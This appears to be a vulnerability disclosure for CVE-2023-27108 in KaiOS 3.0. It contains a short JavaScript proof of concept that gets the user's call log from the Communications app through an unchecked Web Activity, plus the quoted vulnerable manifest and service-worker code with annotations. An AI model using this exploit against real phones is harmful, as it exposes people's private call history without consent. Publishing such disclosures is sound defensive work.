Headline
CVE-2023-27108: KaiOS getCallLogList Activity
An issue was discovered in KaiOS 3.0. The pre-installed Communications application exposes a Web Activity (`getCallLogList`) that returns the user's call log without any origin or permission check: the manifest filter only constrains the activity `type`, and the service-worker handler only compares the activity name before posting the list back. Any JavaScript running in the browser or in another app can therefore start the activity and receive the call log without user interaction or consent, and then send it to a remote server via XMLHttpRequest or Fetch.
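// PoC for CVE-2023-27108: any page or app that can construct a WebActivity
// asks the pre-installed Communications app for the call log. The manifest
// filter quoted below only constrains `type`, and the handler only compares
// the activity name, so no origin or permission check stands between the
// caller and the returned list. (The quote characters were repaired here;
// the page's rendering had turned some of them into typographic quotes.)
const activity = new WebActivity('getCallLogList', {
  type: 'calllog/tel',
});
activity
  .start()
  .then((callLogs) => {
    console.log(callLogs); // Array[] — the list the handler posts back
  })
  .catch((err) => {
    // Surface a rejected activity instead of leaving the promise floating.
    console.error('getCallLogList activity failed', err);
  });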
/*
Exposed via pre-installed Communications app
Manifest URL: http://communications.localhost/manifest.webmanifest
manifest.webmanifest
"activities": {
"getCallLogList": {
"filters": {
"type": {
"required": true,
"value": [
"calllog/tel"
]
}
},
"returnValue": true
}
}
serviceWorker.js
// Module-level state of the Communications service worker, as quoted on this
// page. `DB` is not defined in this excerpt; presumably the app's call-log
// storage wrapper (its getAllData() is called below) — TODO confirm.
let handler = null;
const db = new DB();
// Not referenced anywhere in the excerpt shown here.
let pickHandler = null;
// Slot for the in-flight getCallLogList request handler; it is module-level,
// so it is shared by every system message the worker receives.
let getListHandler = null;
// System-message handler of the Communications service worker, quoted from
// the vulnerable build. Security note: for an 'activity' message the only
// gate before the call log is posted back is the activity *name* (checked
// below). Nothing in this handler inspects handler.source for the requesting
// origin or app, and the manifest filter above only constrains `type`, so any
// caller that can start the activity receives the full list. That missing
// check is CVE-2023-27108.
// NOTE(review): the curly quote characters in some string literals below are
// a rendering artifact of this page; the shipped source presumably uses ASCII
// quotes.
self.onsystemmessage = evt => {
console.log('communications onsystemmessage: ' + evt.name);
// `data` and `viewInfo` are never used in this excerpt.
let data = null;
let viewInfo = null;
// The IIFE has no return statement, so waitUntil() receives undefined rather
// than the getAllData() promise chain started below.
evt.waitUntil(
(() => {
switch (evt.name) {
case 'activity’:
handler = evt.data.webActivityRequestHandler();
// Name comparison only — no origin, permission or caller-identity check.
if (handler.source.name === ‘getCallLogList’) {
// Module-level slot: if a second activity message arrives before
// getAllData() settles it overwrites this handler, the first callback then
// answers the second requester and nulls the slot, and the second callback
// would call postResult on null.
getListHandler = handler;
db.getAllData()
.then(list => {
// The entire call log is returned to whoever started the activity.
getListHandler.postResult(list);
getListHandler = null;
})
.catch(() => {
// A storage failure is reported to the caller as an empty list.
getListHandler.postResult([]);
getListHandler = null;
});
}
break;
default:
console.log(‘Illegal message’);
}
})()
);
};
*/